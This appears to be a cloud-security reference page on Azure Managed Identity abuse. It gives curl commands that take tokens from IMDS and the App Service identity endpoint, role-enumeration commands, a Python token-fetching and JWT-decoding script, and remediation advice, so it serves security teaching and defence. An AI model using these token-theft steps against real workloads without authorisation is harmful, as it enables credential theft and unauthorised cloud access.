Managed Identity Abuse

Description

Managed Identities (system- or user-assigned) let Azure resources obtain Entra ID access tokens without any stored credential: on VMs and scale sets the token comes from the Instance Metadata Service (IMDS, 169.254.169.254), on App Service, Functions and similar PaaS hosts from a local identity endpoint that the platform injects into the process environment. Anything that can reach that endpoint from inside the resource, whether legitimate code, an attacker with command execution, or an SSRF that can set the required header, can mint tokens. An over-privileged identity then turns that into access tokens for Azure Resource Manager, Microsoft Graph, Key Vault, or any other Entra-protected resource the identity has been granted (Storage, SQL, custom APIs), and from there into reading downstream data or modifying infrastructure. A stolen token stays usable until its exp claim; it is the identity's role assignments, not the token, that can be cut off.

Examples

Fetch MI Token (On VM/Function)

curl -H "Metadata:true" \
  'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https%3A%2F%2Fmanagement.azure.com%2F'

Use the token to list the subscriptions the identity holds any role on (an empty list means no ARM scope at all, but the identity may still have Graph or Key Vault data-plane access):

curl -H "Authorization: Bearer <token>" https://management.azure.com/subscriptions?api-version=2020-01-01

Enumerate Role Assignments for the MI

# The assignee is the object (principal) ID of the managed identity: the oid claim in its
# token, or principalId on the identity's ARM resource. --all covers every scope in the current subscription.
az role assignment list --assignee <principal-id> --all -o table

App Service/Function Identity Endpoint

On App Service and Functions there is no IMDS. The platform injects IDENTITY_ENDPOINT and IDENTITY_HEADER into the process environment, and the token endpoint requires the header value as a per-instance secret, so any SSRF, file read or debug page that leaks the environment is enough to request tokens:

curl "$IDENTITY_ENDPOINT?api-version=2019-08-01&resource=https://vault.azure.net" \
  -H "X-IDENTITY-HEADER: $IDENTITY_HEADER"
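
The three examples above are tied together by one question: which endpoint does this host expose, and which principal does the resulting token belong to? The following script is an added example, not code from the original page. It selects the IMDS or App Service identity endpoint from the environment, builds the exact request shown above, and decodes the returned JWT (without verifying it) to read the oid that `az role assignment list --assignee` needs. The DEMO_CLAIMS values, the MI_LIVE opt-in variable and the xms_mirid handling are assumptions of this example; the endpoint URLs, api-versions and headers are the documented ones.

```python
"""Added example: locate the managed-identity token endpoint on this host, build the
token request, and decode the JWT to learn which principal it represents.
All demo values are constructed, not real identities."""
import base64
import json
import os
import urllib.parse
import urllib.request

IMDS_TOKEN_URL = "http://169.254.169.254/metadata/identity/oauth2/token"


def token_request(resource, client_id=None, environ=None):
    """Return (url, headers) for the endpoint this host exposes.

    App Service / Functions inject IDENTITY_ENDPOINT and IDENTITY_HEADER; VMs and
    scale sets use IMDS, whose only SSRF guard is the mandatory 'Metadata: true'
    header. `environ` is injectable so the selection logic can be tested offline.
    """
    env = os.environ if environ is None else environ
    params = {"resource": resource}
    if client_id:  # pick one user-assigned identity when several are attached
        params["client_id"] = client_id
    if env.get("IDENTITY_ENDPOINT") and env.get("IDENTITY_HEADER"):
        params["api-version"] = "2019-08-01"
        url = env["IDENTITY_ENDPOINT"] + "?" + urllib.parse.urlencode(params)
        return url, {"X-IDENTITY-HEADER": env["IDENTITY_HEADER"]}
    params["api-version"] = "2018-02-01"
    return IMDS_TOKEN_URL + "?" + urllib.parse.urlencode(params), {"Metadata": "true"}


def fetch_token(resource, client_id=None, timeout=5):
    """Network call: request the token and return the raw access_token string."""
    url, headers = token_request(resource, client_id)
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.load(resp)["access_token"]


def _b64url(segment):
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_claims(jwt):
    """Read the payload without verifying the signature: we are the party that just
    received the token and only want its claims, not to trust it."""
    parts = jwt.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact-serialised JWT")
    return json.loads(_b64url(parts[1]))


def identity_summary(jwt):
    """The claims that drive follow-on enumeration: audience, the service principal
    object id (the value 'az role assignment list --assignee' needs), app id, tenant,
    expiry, and xms_mirid (ARM id of the identity, when the claim is present)."""
    c = decode_claims(jwt)
    return {
        "audience": c.get("aud"),
        "principal_id": c.get("oid"),
        "app_id": c.get("appid"),
        "tenant_id": c.get("tid"),
        "mi_resource_id": c.get("xms_mirid"),
        "expires": c.get("exp"),
    }


def build_demo_token(claims):
    """Constructed, unsigned token so the decoding path can run offline."""
    enc = lambda o: base64.urlsafe_b64encode(json.dumps(o).encode()).rstrip(b"=").decode()
    return enc({"alg": "none", "typ": "JWT"}) + "." + enc(claims) + ".sig"


DEMO_CLAIMS = {  # constructed values for the offline run
    "aud": "https://management.azure.com/",
    "oid": "11111111-2222-3333-4444-555555555555",
    "appid": "66666666-7777-8888-9999-000000000000",
    "tid": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
    "exp": 1700000000,
}

if __name__ == "__main__":
    url, headers = token_request("https://management.azure.com/")
    print("would request:", url, headers)
    print(identity_summary(build_demo_token(DEMO_CLAIMS)))
    if os.environ.get("MI_LIVE"):  # opt-in: only meaningful on an Azure host
        print(identity_summary(fetch_token("https://management.azure.com/")))
```

Run it as-is on a workstation to see the request it would make and the decoded demo claims; set MI_LIVE=1 on an Azure VM or App Service instance to fetch and decode a real token. Feed the printed principal_id to the role-assignment enumeration above, and try other audiences (https://graph.microsoft.com/, https://vault.azure.net) to map what the identity can reach.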

Remediation

  1. Scope roles to least privilege
    • Avoid Owner/Contributor at subscription or management-group scope; grant resource-scoped roles, and prefer data-plane roles (e.g. Key Vault Secrets User on one vault) over control-plane ones where the workload only needs data.
    • Give each workload its own identity; a user-assigned identity shared across many apps means one SSRF in any of them exposes all of their permissions.
  2. Protect token endpoints and audiences
    • IMDS is link-local and answered by the host, so network egress filtering does not block it. Fix SSRF in the application instead: resolve and validate destinations, refuse loopback and link-local addresses, do not follow redirects, and never forward the Metadata or X-IDENTITY-HEADER headers. Where a host firewall is available, restrict which local users may reach 169.254.169.254.
    • Validate token audience and issuer server-side in every service that accepts these tokens; a token minted for management.azure.com must not be accepted by an internal API.
  3. Network and platform controls
    • Prefer private endpoints and VNet integration for downstream services so a token alone is not enough from outside the network; lock down the App Service SCM (Kudu) site, which exposes the environment including IDENTITY_HEADER; after an incident, rotate any credentials the identity could have read (Key Vault secrets, connection strings); correlate Entra managed-identity sign-in logs, which record each token issuance, with the Azure Activity Log and Key Vault diagnostic logs, where the caller IP shows a token being replayed from outside the workload.